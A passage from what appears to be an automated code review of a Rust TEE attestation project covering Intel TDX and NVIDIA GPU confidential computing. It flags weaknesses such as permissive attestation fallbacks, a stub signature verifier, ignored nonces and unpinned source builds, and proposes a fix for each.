When node_tee_status is empty, COUNT(*) returns 0 but SUM(CASE ...) returns NULL. The row.get::<i64, _>("tee_verified_count") call will panic on NULL. Use COALESCE or handle the nullable case:

Proposed fix
         let row = sqlx::query(
             r#"
             SELECT 
                 COUNT(*) as total_nodes,
-                SUM(CASE WHEN tee_verified = 1 THEN 1 ELSE 0 END) as tee_verified_count,
-                SUM(CASE WHEN tdx_verified = 1 THEN 1 ELSE 0 END) as tdx_verified_count,
-                SUM(CASE WHEN gpu_cc_enabled = 1 THEN 1 ELSE 0 END) as gpu_cc_enabled_count
+                COALESCE(SUM(CASE WHEN tee_verified = 1 THEN 1 ELSE 0 END), 0) as tee_verified_count,
+                COALESCE(SUM(CASE WHEN tdx_verified = 1 THEN 1 ELSE 0 END), 0) as tdx_verified_count,
+                COALESCE(SUM(CASE WHEN gpu_cc_enabled = 1 THEN 1 ELSE 0 END), 0) as gpu_cc_enabled_count
             FROM node_tee_status
             "#,
         )
crates/basilica-validator/src/miner_prover/validation_tee.rs-878-903 (1)

878-903: ⚠️ Potential issue | 🟠 Major

Attestation considered valid when no tool is available — permissive fallback undermines verification.

When no attestation tool is found (Lines 897–901), attestation_valid is set to true and nonce_verified mirrors it (Line 903). This means a node with CC mode flag set but no actual attestation capability passes verification. An adversary could spoof nvidia-smi output to claim CC mode without providing cryptographic proof.

Consider requiring attestation tool availability when require_gpu_cc is set, or at least marking attestation_valid as false and nonce_verified as false when no tool is present, so the caller can make the policy decision.
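A fail-closed variant could look like the following sketch, where `GpuCcVerificationResult` is a simplified stand-in for the real struct:

```rust
// Hedged sketch of a fail-closed fallback: when no attestation tool is present,
// report the attestation as unverified and let the caller apply policy.
#[derive(Debug)]
struct GpuCcVerificationResult {
    cc_mode_enabled: bool,
    attestation_valid: bool,
    nonce_verified: bool,
}

fn verify_with_tool_availability(cc_mode_enabled: bool, tool_available: bool) -> GpuCcVerificationResult {
    if !tool_available {
        // Fail closed: a CC-mode flag without cryptographic proof is not "verified".
        return GpuCcVerificationResult {
            cc_mode_enabled,
            attestation_valid: false,
            nonce_verified: false,
        };
    }
    // ... real attestation-tool invocation would go here ...
    GpuCcVerificationResult {
        cc_mode_enabled,
        attestation_valid: true,
        nonce_verified: true,
    }
}

fn main() {
    let r = verify_with_tool_availability(true, false);
    assert!(!r.attestation_valid && !r.nonce_verified);
}
```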

crates/basilica-tee/src/service.rs-366-370 (1)

366-370: ⚠️ Potential issue | 🟠 Major

with_expected_measurements is a no-op.

This builder method silently discards the ExpectedMeasurements parameter. Callers will believe measurements are configured, but they aren't. This should either be implemented or removed to avoid a false sense of security.
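If implementing it, the builder only needs to store the value so verification can later compare against it — a sketch with simplified stand-in types:

```rust
// Hedged sketch: a builder method that stores the measurements instead of
// discarding them. Both types are simplified stand-ins for the real ones.
#[derive(Debug, Clone, PartialEq)]
struct ExpectedMeasurements {
    mrtd_hex: String,
}

#[derive(Debug, Default)]
struct TeeServiceBuilder {
    expected_measurements: Option<ExpectedMeasurements>,
}

impl TeeServiceBuilder {
    fn with_expected_measurements(mut self, m: ExpectedMeasurements) -> Self {
        // Store rather than drop, so verification can compare against them later.
        self.expected_measurements = Some(m);
        self
    }
}

fn main() {
    let b = TeeServiceBuilder::default()
        .with_expected_measurements(ExpectedMeasurements { mrtd_hex: "ab".into() });
    assert!(b.expected_measurements.is_some());
}
```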

crates/basilica-validator/src/miner_prover/validation_tee.rs-188-379 (1)

188-379: ⚠️ Potential issue | 🟠 Major

Shell script clones and compiles code from GitHub on remote nodes — significant supply chain risk.

The TDX tool installation script (Lines 238–348) clones intel/SGXDataCenterAttestationPrimitives from GitHub, builds C code, and installs the binary to /usr/local/bin/. This introduces supply chain risk:

  • No pinned commit hash or tag — --depth 1 fetches whatever HEAD is
  • No integrity verification of the cloned code
  • Compiles and installs as root

Consider pinning a specific commit hash, verifying a checksum of the built binary, or preferring the package-based installation path. Also, the embedded C code (Lines 242–341) directly interacts with TDX kernel ioctls — any changes in the kernel ABI could cause undefined behavior.
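A sketch of the pin-and-verify pattern in shell; the clone/checkout lines are shown as comments because `COMMIT` and `EXPECTED_SHA256` are placeholder values, and only the checksum helper is demonstrated against a stand-in file:

```shell
#!/usr/bin/env bash
# Hedged sketch: pin the clone to a known commit and verify the built binary's
# checksum before installing. COMMIT and EXPECTED_SHA256 are placeholders.
set -euo pipefail

verify_checksum() {
    local file="$1" expected="$2"
    local actual
    actual=$(sha256sum "$file" | awk '{print $1}')
    [ "$actual" = "$expected" ]
}

# In the real install script, after building:
#   git clone https://github.com/intel/SGXDataCenterAttestationPrimitives
#   git -C SGXDataCenterAttestationPrimitives checkout "$COMMIT"  # pinned, not HEAD
#   verify_checksum ./tdx_tool "$EXPECTED_SHA256" || exit 1

# Demonstration with a stand-in file:
tmpfile=$(mktemp)
printf 'demo' > "$tmpfile"
expected=$(sha256sum "$tmpfile" | awk '{print $1}')
if verify_checksum "$tmpfile" "$expected"; then
    echo "CHECKSUM_OK"
fi
rm -f "$tmpfile"
```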

crates/basilica-tee/src/service.rs-255-263 (1)

255-263: ⚠️ Potential issue | 🟠 Major

tee_verified ignores nonce_verified and report_data_matches.

The overall verification result doesn't account for nonce_verified (GPU) or report_data_matches (TDX). An attestation with correct signatures but wrong nonce would still pass, defeating replay protection.

Proposed fix
         let tee_verified = match (&tdx_result, &gpu_result) {
             (Some(tdx), Some(gpu)) => {
-                tdx.quote_valid && tdx.mrtd_matches && gpu.cc_mode_enabled && gpu.attestation_valid
+                tdx.quote_valid && tdx.mrtd_matches && tdx.report_data_matches
+                    && gpu.cc_mode_enabled && gpu.attestation_valid && gpu.nonce_verified
             }
-            (Some(tdx), None) => tdx.quote_valid && tdx.mrtd_matches,
-            (None, Some(gpu)) => gpu.cc_mode_enabled && gpu.attestation_valid,
+            (Some(tdx), None) => tdx.quote_valid && tdx.mrtd_matches && tdx.report_data_matches,
+            (None, Some(gpu)) => gpu.cc_mode_enabled && gpu.attestation_valid && gpu.nonce_verified,
             (None, None) => false,
         };
crates/basilica-tee/src/gpu/verifier.rs-38-50 (1)

38-50: ⚠️ Potential issue | 🟠 Major

Stub signature verification is a significant security gap for production.

verify_signature always returns Ok(true), meaning any evidence will pass local verification. While documented, this effectively makes LocalGpuVerifier unsuitable for production attestation — it provides no cryptographic guarantees. Consider at minimum logging at warn! level (not debug!) to make this more visible in production logs, or gating behind a stub-verification feature so it can't silently slip into a production build.

Suggested log level change
     fn verify_signature(&self, _evidence: &GpuAttestationEvidence) -> TeeResult<bool> {
-        debug!("[GpuVerifier] Signature verification stub - returning true");
-        debug!("[GpuVerifier] NOTE: Implement actual verification for production use");
+        warn!("[GpuVerifier] Signature verification stub - returning true. NOT SAFE FOR PRODUCTION.");

         Ok(true)
     }
crates/basilica-tee/src/tdx/provider.rs-94-99 (1)

94-99: ⚠️ Potential issue | 🟠 Major

Certificate hash errors silently swallowed — security degradation.

Line 96 uses .ok() to discard cert hash failures. If the server certificate is configured but hashing fails (e.g., file not found, OpenSSL error), the quote is generated without cert binding. This is a silent security downgrade that should at minimum log a warning.

Proposed fix
         let cert_hash = if self.server_cert_path.is_some() {
-            self.get_cert_hash().await.ok()
+            match self.get_cert_hash().await {
+                Ok(hash) => Some(hash),
+                Err(e) => {
+                    warn!("Failed to compute certificate hash, quote will not include cert binding: {}", e);
+                    None
+                }
+            }
         } else {
             None
         };
crates/basilica-tee/src/service.rs-232-253 (1)

232-253: ⚠️ Potential issue | 🟠 Major

Only the first GPU evidence entry is verified — multi-GPU setups are silently ignored.

evidence_list.first() verifies only one GPU. If the attestation includes multiple GPUs, the remaining ones are unchecked. The GpuVerifier trait already provides verify_all for this purpose. Also, gpu_result stores a single Option<GpuCcVerificationResult> rather than a Vec.

Suggested approach: verify all GPU evidence
-        let mut gpu_result: Option<GpuCcVerificationResult> = None;
+        let mut gpu_results: Vec<GpuCcVerificationResult> = Vec::new();
         ...
-            if let Some(first_evidence) = evidence_list.first() {
-                match self
-                    .gpu_verifier
-                    .verify(first_evidence, Some(&attestation.nonce_hex))
-                    .await
-                {
-                    Ok(result) => {
-                        gpu_result = Some(result);
-                ...
+                match self
+                    .gpu_verifier
+                    .verify_all(&evidence_list, Some(&attestation.nonce_hex))
+                    .await
+                {
+                    Ok(results) => {
+                        gpu_results = results;
+                ...

This would also require updating TeeVerificationResult to hold a Vec<GpuCcVerificationResult> instead of Option<GpuCcVerificationResult>.

crates/basilica-tee/src/server/handlers.rs-199-199 (1)

199-199: ⚠️ Potential issue | 🟠 Major

Empty string as default nonce weakens attestation freshness.

When params.nonce is None, the code defaults to "", generating attestation without a meaningful nonce. This defeats replay protection. Consider returning a 400 Bad Request if no nonce is provided, or at minimum documenting this as intentional behavior.

Proposed fix: require nonce
-        let nonce = params.nonce.as_deref().unwrap_or("");
+        let nonce = match params.nonce.as_deref() {
+            Some(n) if !n.is_empty() => n,
+            _ => {
+                return Err((
+                    StatusCode::BAD_REQUEST,
+                    Json(ErrorResponse {
+                        error: "Nonce is required for evidence generation".to_string(),
+                    }),
+                ));
+            }
+        };
🟡 Minor comments (26)
crates/basilica-validator/src/metrics/prometheus_metrics.rs-875-877 (1)

875-877: ⚠️ Potential issue | 🟡 Minor

Persistence errors logged at debug! — should be error! or warn! for consistency.

collect_system_metrics (line 532) logs failures at error! level. A database query failure here has the same operational impact and would be invisible in production at default log levels.

Suggested fix
             Err(e) => {
-                debug!("Failed to collect TEE metrics from database: {}", e);
+                error!("Failed to collect TEE metrics from database: {}", e);
             }
justfile-160-168 (1)

160-168: ⚠️ Potential issue | 🟡 Minor

Missing confirmation prompt for a destructive reboot action.

test-tdx-reboot reboots a remote node but has no user confirmation prompt, unlike the other destructive targets (test-tdx-setup, test-tdx-setup-full, test-tdx-guest-quote, test-tdx-vm-create, test-tdx-attestation) which all gate execution behind read -p ... (y/N).

🛡️ Proposed fix: add a confirmation prompt
 test-tdx-reboot HOST USER="root" KEY_PATH="~/.ssh/id_rsa":
     #!/usr/bin/env bash
     set -euo pipefail
-    echo "🔄 Rebooting {{HOST}} and waiting for it to come back..."
-    TDX_TEST_HOST="{{HOST}}" \
-    TDX_TEST_USER="{{USER}}" \
-    TDX_TEST_KEY_PATH="{{KEY_PATH}}" \
-    cargo test --package basilica-validator --test tdx_host_integration_test test_reboot_and_wait -- --ignored --nocapture
+    echo "⚠️  Rebooting {{HOST}} and waiting for it to come back..."
+    read -p "Are you sure? (y/N) " -n 1 -r
+    echo
+    if [[ $REPLY =~ ^[Yy]$ ]]; then
+        TDX_TEST_HOST="{{HOST}}" \
+        TDX_TEST_USER="{{USER}}" \
+        TDX_TEST_KEY_PATH="{{KEY_PATH}}" \
+        cargo test --package basilica-validator --test tdx_host_integration_test test_reboot_and_wait -- --ignored --nocapture
+    else
+        echo "Cancelled."
+    fi
crates/basilica-tee/src/gpu/utils.rs-78-83 (1)

78-83: ⚠️ Potential issue | 🟡 Minor

gpu_id_contains_any uses bidirectional substring check which can produce false positives.

The bidirectional contains check (gpu_id.contains(&normalized_target) || normalized_target.contains(gpu_id)) means a short gpu_id like "GPU-1" would match a target "GPU-123" via the second branch. This seems overly permissive for a security-related GPU identity check.

Also, this function mixes normalize_gpu_id (prefix-based) with substring matching, while sibling functions use sanitize_gpu_id (strip-and-compare). The inconsistency could lead to subtle matching bugs.

Consider whether exact-match via gpu_id_in_list is sufficient, or clarify the intended use case for substring matching.
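The false positive can be demonstrated with a minimal sketch (both functions are simplified stand-ins for the ones in `gpu/utils.rs`):

```rust
// Hedged sketch: bidirectional substring matching vs. exact matching.
fn gpu_id_contains_any(gpu_id: &str, targets: &[String]) -> bool {
    let id = gpu_id.to_lowercase();
    targets.iter().any(|t| {
        let t = t.to_lowercase();
        // Bidirectional check: permissive, allows short IDs to match longer targets.
        id.contains(&t) || t.contains(&id)
    })
}

fn gpu_id_in_list(gpu_id: &str, targets: &[String]) -> bool {
    // Exact (case-insensitive) match: strict.
    targets.iter().any(|t| t.eq_ignore_ascii_case(gpu_id))
}

fn main() {
    let targets = vec!["GPU-123".to_string()];
    // "GPU-1" matches "GPU-123" via the reverse branch — a false positive.
    assert!(gpu_id_contains_any("GPU-1", &targets));
    // Exact matching rejects it.
    assert!(!gpu_id_in_list("GPU-1", &targets));
}
```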

crates/basilica-tee/src/bootstrap/commands/tdx_guest.rs-335-405 (1)

335-405: ⚠️ Potential issue | 🟡 Minor

TMPDIR variable shadowing in TEST_GUEST_QUOTE_GEN.

Same issue as in tdx.rs — the script reassigns TMPDIR (Line 360), which shadows the standard environment variable that tools like mktemp rely on. Use a different name (e.g., WORK_DIR).

crates/basilica-miner/src/tee.rs-82-89 (1)

82-89: ⚠️ Potential issue | 🟡 Minor

GPU CC check error is silently dropped when TDX check also failed.

Line 85: if status.error.is_none() means if both TDX and GPU CC checks fail, only the TDX error is preserved. The GPU CC error is silently lost. Consider appending errors instead.

Proposed fix
             Err(e) => {
                 warn!("[TEE] Failed to check GPU CC on node {}: {}", node_id, e);
-                if status.error.is_none() {
-                    status.error = Some(format!("GPU CC check failed: {}", e));
-                }
+                let gpu_err = format!("GPU CC check failed: {}", e);
+                status.error = Some(match status.error.take() {
+                    Some(existing) => format!("{}; {}", existing, gpu_err),
+                    None => gpu_err,
+                });
             }
crates/basilica-tee/src/bootstrap/commands/tdx.rs-131-161 (1)

131-161: ⚠️ Potential issue | 🟡 Minor

TMPDIR shadows the standard environment variable; QUOTE_FAILED exits 0.

Two issues in TEST_QUOTE_GENERATION:

  1. Line 134: Reassigning TMPDIR shadows the well-known env var that mktemp and other tools depend on. Use a different variable name (e.g., WORK_DIR).
  2. Line 160: The QUOTE_FAILED path falls through without exit 1, so callers cannot distinguish success from failure by exit code.
Proposed fix
-    TMPDIR=$(mktemp -d)
+    WORK_DIR=$(mktemp -d)
     
     # Write nonce to file
-    echo -n "$TEST_NONCE" | xxd -r -p > "$TMPDIR/nonce.bin"
+    echo -n "$TEST_NONCE" | xxd -r -p > "$WORK_DIR/nonce.bin"
     
     # Try Intel's tdx_attest tool
     if command -v tdx_attest &>/dev/null; then
-        if tdx_attest -r "$TMPDIR/nonce.bin" -q "$TMPDIR/quote.bin" 2>/dev/null; then
-            QUOTE_SIZE=$(stat -c%s "$TMPDIR/quote.bin" 2>/dev/null || stat -f%z "$TMPDIR/quote.bin" 2>/dev/null)
+        if tdx_attest -r "$WORK_DIR/nonce.bin" -q "$WORK_DIR/quote.bin" 2>/dev/null; then
+            QUOTE_SIZE=$(stat -c%s "$WORK_DIR/quote.bin" 2>/dev/null || stat -f%z "$WORK_DIR/quote.bin" 2>/dev/null)
             if [ "$QUOTE_SIZE" -gt 1000 ]; then
-                rm -rf "$TMPDIR"
+                rm -rf "$WORK_DIR"
                 echo "QUOTE_OK:tdx_attest:$QUOTE_SIZE"
                 exit 0
             fi
@@ ..
     # Try using TDX device directly with a simple test
     if [ -c /dev/tdx_guest ] || [ -c /dev/tdx-guest ]; then
         # The device exists, quote generation should be possible via libraries
-        rm -rf "$TMPDIR"
+        rm -rf "$WORK_DIR"
         echo "DEVICE_OK:tdx_guest"
         exit 0
     fi
     
-    rm -rf "$TMPDIR"
+    rm -rf "$WORK_DIR"
     echo "QUOTE_FAILED"
+    exit 1
crates/basilica-tee/src/bootstrap/commands/tdx.rs-84-91 (1)

84-91: ⚠️ Potential issue | 🟡 Minor

RHEL repo baseurl hardcoded to version 8.

The repo configuration hardcodes rhel/8/$basearch. This will install incorrect packages on RHEL 9+ systems. Consider detecting the major version dynamically (e.g., via $(rpm -E %{rhel})) or at minimum documenting this limitation.

Proposed fix
-        sudo tee /etc/yum.repos.d/intel-sgx.repo > /dev/null << 'REPOEOF'
-[intel-sgx]
-name=Intel SGX Repository
-baseurl=https://download.01.org/intel-sgx/sgx_repo/rhel/8/$basearch
-enabled=1
-gpgcheck=1
-gpgkey=https://download.01.org/intel-sgx/sgx_repo/rhel/8/sgx_rpm_local_repo.pub
-REPOEOF
+        RHEL_VER=$(rpm -E %{rhel} 2>/dev/null || echo "8")
+        sudo tee /etc/yum.repos.d/intel-sgx.repo > /dev/null << REPOEOF
+[intel-sgx]
+name=Intel SGX Repository
+baseurl=https://download.01.org/intel-sgx/sgx_repo/rhel/${RHEL_VER}/\$basearch
+enabled=1
+gpgcheck=1
+gpgkey=https://download.01.org/intel-sgx/sgx_repo/rhel/${RHEL_VER}/sgx_rpm_local_repo.pub
+REPOEOF
crates/basilica-tee/src/gpu/device.rs-113-118 (1)

113-118: ⚠️ Potential issue | 🟡 Minor

Model short-ref extraction is fragile.

Taking the last whitespace-delimited word of the GPU name (e.g., "NVIDIA H100 PCIe" → "pcie") may not produce the useful model identifier you expect (e.g., "h100"). Multi-word suffixes like "80GB PCIe" would yield "pcie" instead of the model name. Consider a more robust extraction or matching against known model patterns.

crates/basilica-tee/src/tdx/mod.rs-1-7 (1)

1-7: ⚠️ Potential issue | 🟡 Minor

Doc mentions v5 support but only v4 types are re-exported.

Line 4 states "TDX quote parsing (v4/v5)" but only TdxQuoteV4 is re-exported. If v5 isn't implemented yet, update the doc to avoid implying it's supported (e.g., "v4, with v5 planned").

crates/basilica-tee/src/lib.rs-12-21 (1)

12-21: ⚠️ Potential issue | 🟡 Minor

Module doc list is incomplete — crypto and service are missing.

Both crypto (Line 24) and service (Line 29) are publicly exported but not listed in the doc header. Add entries for completeness.

📝 Proposed doc update
 //! - [`config`]: Configuration types for TEE settings
 //! - [`error`]: Error types for TEE operations
+//! - [`crypto`]: Cryptographic utilities for TEE operations
 //! - [`types`]: Shared data types
 //! - [`traits`]: Core trait abstractions for providers and verifiers
+//! - [`service`]: TEE attestation service orchestration
crates/basilica-tee/src/bootstrap/commands/tdx_host.rs-145-182 (1)

145-182: ⚠️ Potential issue | 🟡 Minor

PCCS_PASSWORD parameter is accepted but never used.

Line 147 reads PCCS_PASSWORD from env/args, but the PCCS config template (lines 156-169) never uses it. The UserTokenHash and AdminTokenHash fields are left empty, meaning the PCCS management API has no authentication.

If the password is intended to populate these hash fields, it needs to be hashed (SHA-512) and written into the config. If auth isn't needed for this use case, remove the dead PCCS_PASSWORD parameter to avoid confusion.

crates/basilica-validator/tests/tdx_host_integration_test.rs-9-14 (1)

9-14: ⚠️ Potential issue | 🟡 Minor

Hard-coded IP address in documentation.

Line 10 contains what appears to be a real host IP (151.185.43.58). Replace with a placeholder like <TDX_HOST_IP> to avoid leaking infrastructure details in source control.

Proposed fix
-//! TDX_TEST_HOST=151.185.43.58 \
+//! TDX_TEST_HOST=<TDX_HOST_IP> \
crates/basilica-validator/src/config/main_config.rs-204-207 (1)

204-207: ⚠️ Potential issue | 🟡 Minor

Default DCAP URL points to Intel's development attestation service.

The URL contains /dev/ in the path (sgx/dev/attestation/v4/report), indicating a development endpoint. Operators deploying with default configuration will route attestation requests to Intel's dev service, which is inappropriate for production. Either use a documented production endpoint or require this to be explicitly configured and add a clear warning in comments/documentation.

crates/basilica-tee/src/tdx/remote_verification.rs-171-174 (1)

171-174: ⚠️ Potential issue | 🟡 Minor

Hardcoded mrtd_matches: true and rtmr_matches: vec![true; 4] are misleading.

Returning true for measurements that were never actually checked makes downstream consumers unable to distinguish "verified and matched" from "not checked." Consider using an Option<bool> or a separate enum to express "not checked by remote" vs. "checked and matched."
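One way to express the tri-state, sketched with a hypothetical enum (`MeasurementCheck` is not existing code):

```rust
// Hedged sketch: make "not checked by remote" explicit instead of hardcoding true.
#[derive(Debug, Clone, Copy, PartialEq)]
enum MeasurementCheck {
    NotChecked,
    Matched,
    Mismatched,
}

impl MeasurementCheck {
    fn is_failure(self) -> bool {
        matches!(self, MeasurementCheck::Mismatched)
    }
}

fn main() {
    // A remote verifier that skips MRTD/RTMR comparison reports NotChecked,
    // which downstream consumers can distinguish from Matched.
    let mrtd = MeasurementCheck::NotChecked;
    assert!(!mrtd.is_failure());
    assert_ne!(mrtd, MeasurementCheck::Matched);
}
```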

crates/basilica-tee/src/tdx/remote_verification.rs-151-152 (1)

151-152: ⚠️ Potential issue | 🟡 Minor

Inconsistency between inline validity check and QuoteVerificationStatus::is_acceptable().

Line 151-152 accepts only "OK" and "GROUP_OUT_OF_DATE", while QuoteVerificationStatus::is_acceptable() (Line 239-248) also accepts ConfigurationNeeded, SwHardeningNeeded, and ConfigurationAndSwHardeningNeeded. The enum is defined but never used in verify(). Consider using the enum to determine validity for consistency:

-        let quote_valid = verification.is_v_enclave_quote_status == "OK"
-            || verification.is_v_enclave_quote_status == "GROUP_OUT_OF_DATE";
+        let status = QuoteVerificationStatus::from(verification.is_v_enclave_quote_status.as_str());
+        let quote_valid = status.is_acceptable();

Also applies to: 237-254

crates/basilica-tee/src/bootstrap/types.rs-7-18 (1)

7-18: ⚠️ Potential issue | 🟡 Minor

command_timeout_secs defaults to 0 — likely causes immediate command timeouts.

TeeBootstrapConfig derives Default, so command_timeout_secs: u64 defaults to 0. Any command execution using this timeout would either fail immediately or be interpreted as "no timeout" depending on the consumer. Consider providing a sensible default:

Proposed fix
-#[derive(Debug, Clone, Default)]
+#[derive(Debug, Clone)]
 pub struct TeeBootstrapConfig {
     /// Whether to attempt TDX setup
     pub setup_tdx: bool,
     /// Whether to attempt GPU CC setup
     pub setup_gpu_cc: bool,
     /// Timeout for setup commands (seconds)
     pub command_timeout_secs: u64,
     /// Whether to install packages (requires sudo)
     pub allow_package_install: bool,
 }
+
+impl Default for TeeBootstrapConfig {
+    fn default() -> Self {
+        Self {
+            setup_tdx: false,
+            setup_gpu_cc: false,
+            command_timeout_secs: 120,
+            allow_package_install: false,
+        }
+    }
+}
crates/basilica-tee/src/server/mod.rs-128-147 (1)

128-147: ⚠️ Potential issue | 🟡 Minor

unwrap() in deprecated with_providers can panic at runtime.

Line 140 uses .unwrap() on TeeService::new(hostname). If service creation fails for any reason, this panics. Even though the function is deprecated, callers may still use it. Consider returning a TeeResult<Self> or propagating the error.

Proposed fix
     #[deprecated(note = "Use with_service instead")]
     pub fn with_providers(
         hostname: String,
         _tdx_provider: crate::tdx::TdxQuoteProvider,
         _nv_provider: crate::gpu::NvEvidenceProvider,
         gpu_provider: GpuDeviceProvider,
         bind_addr: SocketAddr,
-    ) -> Self {
-        // Create a service with default providers
-        let service = TeeService::new(hostname).unwrap();
-        Self {
+    ) -> TeeResult<Self> {
+        let service = TeeService::new(hostname)?;
+        Ok(Self {
             service: Arc::new(service),
             gpu_provider,
             bind_addr,
-        }
+        })
     }
crates/basilica-validator/src/persistence/tee_profile.rs-39-76 (1)

39-76: ⚠️ Potential issue | 🟡 Minor

gpu_cc_uuid is never inserted but is selected — reads will always return NULL.

The INSERT statement omits the gpu_cc_uuid column, so it will remain NULL for all inserted/updated rows. Both get_node_tee_status (line 109) and get_node_tee_status_by_node_id (line 228) select this column, meaning callers will always receive NULL values.

However, TeeVerificationStatus does not have a gpu_cc_uuid field to provide data. Either the column should not be selected, or gpu_cc_uuid needs to be added to TeeVerificationStatus and bound in the INSERT statement.

crates/basilica-tee/src/server/handlers.rs-119-127 (1)

119-127: ⚠️ Potential issue | 🟡 Minor

Internal error details exposed to API clients.

Error messages like format!("Attestation failed: {}", e) propagate internal TeeError details to the HTTP response. In a security-sensitive attestation service, this could leak implementation details. Consider returning generic messages to clients and logging the detailed error server-side only.

Also applies to: 146-154, 205-213
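A sketch of the split — detailed error to the server log, generic message to the client (`TeeError` here is a simplified stand-in, and `eprintln!` stands in for the real logging macro):

```rust
// Hedged sketch: log internals server-side, return a generic client message.
use std::fmt;

#[derive(Debug)]
enum TeeError {
    GpuAttestation(String),
}

impl fmt::Display for TeeError {
    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
        match self {
            TeeError::GpuAttestation(msg) => write!(f, "GPU attestation error: {}", msg),
        }
    }
}

fn client_error_message(e: &TeeError) -> String {
    // Detailed error goes to the server log only (stand-in for tracing::error!).
    eprintln!("attestation failed: {}", e);
    // The client sees a generic message with no internal detail.
    "Attestation failed".to_string()
}

fn main() {
    let e = TeeError::GpuAttestation("nvml handle 0x7f... invalid".into());
    assert_eq!(client_error_message(&e), "Attestation failed");
}
```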

crates/basilica-protocol/proto/tee.proto-17-18 (1)

17-18: ⚠️ Potential issue | 🟡 Minor

bytes field for hex-encoded nonce is semantically inconsistent.

The comment says "64 bytes, hex encoded" but the field type is bytes. If the value is hex-encoded, use string; if it's raw bytes, update the comment. This same inconsistency appears in NodeTeeStatus.mrtd (Line 140) and all ExpectedMeasurements fields (Lines 170-182). Mismatched semantics between proto type and usage will cause confusion for consumers.
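If the value is hex text, the `string` variant could look like this sketch (field names and numbers are illustrative, not the actual `tee.proto` layout):

```proto
// Hedged sketch: declare hex-encoded values as string so the proto type
// matches the comment's semantics.
message AttestationRequest {
  // 64-byte nonce, hex encoded (128 hex characters)
  string nonce_hex = 1;
  // Alternative, if the value is raw binary: keep `bytes` and drop
  // the "hex encoded" wording from the comment.
  // bytes nonce = 1;
}
```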

crates/basilica-tee/src/server/handlers.rs-159-186 (1)

159-186: ⚠️ Potential issue | 🟡 Minor

Single-purpose endpoints trigger full attestation unnecessarily.

Both get_tdx_quote and get_nvtrust_evidence call state.service.attest(), which generates both TDX quotes and GPU evidence. Each endpoint then discards the unneeded half. This wastes resources (e.g., unnecessary GPU attestation calls). Consider adding dedicated methods on TeeService (e.g., attest_tdx_only, attest_gpu_only), or passing flags to skip the unneeded provider.

Also applies to: 188-223

crates/basilica-tee/src/gpu/verifier.rs-60-77 (1)

60-77: ⚠️ Potential issue | 🟡 Minor

Nonce value logged in warning message — potential information leakage.

Line 69-70 logs both the expected and actual nonce values at warn level. Nonces are security-relevant and should not be written to logs in plaintext. Log only the mismatch fact, not the values.

Proposed fix
             if !matches {
                 warn!(
-                    "[GpuVerifier] Nonce mismatch: expected {}, got {}",
-                    expected, evidence.nonce
+                    "[GpuVerifier] Nonce mismatch for GPU {}",
+                    evidence.gpu_uuid
                 );
             }
crates/basilica-tee/src/service.rs-110-115 (1)

110-115: ⚠️ Potential issue | 🟡 Minor

from_tee_config uses a single enabled flag for both TDX and GPU.

Both enable_tdx and enable_gpu are set to tee_config.enabled. Neither TdxConfig nor GpuCcConfig have independent enabled fields that could be respected, meaning TDX and GPU cannot be enabled/disabled separately when initializing from config. While the builder pattern provides enable_tdx() and enable_gpu() methods to override these values, the from_tee_config factory method treats them as a unit.
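If independent toggling is wanted, per-feature overrides could be layered on the blanket flag — a sketch with illustrative field names:

```rust
// Hedged sketch: optional per-feature flags that override the blanket `enabled`.
#[derive(Debug)]
struct TeeConfig {
    enabled: bool,
    enable_tdx: Option<bool>,
    enable_gpu: Option<bool>,
}

fn resolve_flags(cfg: &TeeConfig) -> (bool, bool) {
    // Per-feature flags win when present; otherwise fall back to `enabled`.
    (
        cfg.enable_tdx.unwrap_or(cfg.enabled),
        cfg.enable_gpu.unwrap_or(cfg.enabled),
    )
}

fn main() {
    let cfg = TeeConfig {
        enabled: true,
        enable_tdx: Some(true),
        enable_gpu: Some(false),
    };
    // TDX on, GPU off — impossible with a single shared flag.
    assert_eq!(resolve_flags(&cfg), (true, false));
}
```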

crates/basilica-validator/src/miner_prover/validation_tdx_host.rs-445-454 (1)

445-454: ⚠️ Potential issue | 🟡 Minor

is_tdx_ready may undercount readiness requirements.

The check only tests tdx_initialized && !reboot_required, but a TDX host also needs PCCS and QGS running for attestation to work. Callers relying on this as a "ready for attestation" gate will get false positives if those services are down.

Consider whether pccs_running and qgs_running should be part of this predicate, or rename/document the method to clarify it checks initialization only.
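The stricter predicate is a one-line change, sketched here with a simplified stand-in for the status struct:

```rust
// Hedged sketch: readiness for attestation includes the PCCS and QGS services,
// not just initialization. `TdxHostStatus` is a simplified stand-in.
#[derive(Debug, Default)]
struct TdxHostStatus {
    tdx_initialized: bool,
    reboot_required: bool,
    pccs_running: bool,
    qgs_running: bool,
}

impl TdxHostStatus {
    /// Ready to serve attestation, not merely initialized.
    fn is_attestation_ready(&self) -> bool {
        self.tdx_initialized && !self.reboot_required && self.pccs_running && self.qgs_running
    }
}

fn main() {
    let s = TdxHostStatus {
        tdx_initialized: true,
        reboot_required: false,
        pccs_running: false,
        qgs_running: true,
    };
    // Initialized but PCCS down: not ready for attestation.
    assert!(!s.is_attestation_ready());
}
```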

crates/basilica-validator/src/miner_prover/validation_tdx_host.rs-428-431 (1)

428-431: ⚠️ Potential issue | 🟡 Minor

setup_tdx_host returns Ok even when the remote script reports SETUP_FAILED.

When SETUP_FAILED: is detected (line 428), the method only logs a warning but still returns Ok(result) with most fields at their default false. Callers that only check the Result envelope will miss the failure.

Consider either returning an error, or at minimum documenting this contract clearly so callers know to inspect TdxHostSetupResult fields.
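A sketch of the error-returning option, parsing the marker the remote script already emits (the parser is illustrative, not the actual code):

```rust
// Hedged sketch: surface SETUP_FAILED as an Err instead of a logged warning.
fn parse_setup_output(output: &str) -> Result<(), String> {
    if let Some(line) = output.lines().find(|l| l.starts_with("SETUP_FAILED:")) {
        // Return the failure reason so callers can't miss it.
        return Err(line.trim_start_matches("SETUP_FAILED:").trim().to_string());
    }
    Ok(())
}

fn main() {
    assert!(parse_setup_output("SETUP_FAILED: missing BIOS option").is_err());
    assert!(parse_setup_output("SETUP_OK").is_ok());
}
```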

crates/basilica-validator/src/miner_prover/validation_tdx_host.rs-870-875 (1)

870-875: ⚠️ Potential issue | 🟡 Minor

Swallowed install failure makes attestation test failures harder to diagnose.

Line 874 uses unwrap_or_default(), discarding any error from installing guest attestation tools. If the install fails, the subsequent quote-generation test will also fail, but the root cause (install failure) is lost.

Consider at least logging at warn level when the install fails, similar to how other methods in this file handle partial failures.

Suggested fix
-        let install_output = self
+        let install_output = match self
             .ssh_client
             .execute_command(connection, &install_cmd, true)
             .await
-            .unwrap_or_default();
+        {
+            Ok(output) => output,
+            Err(e) => {
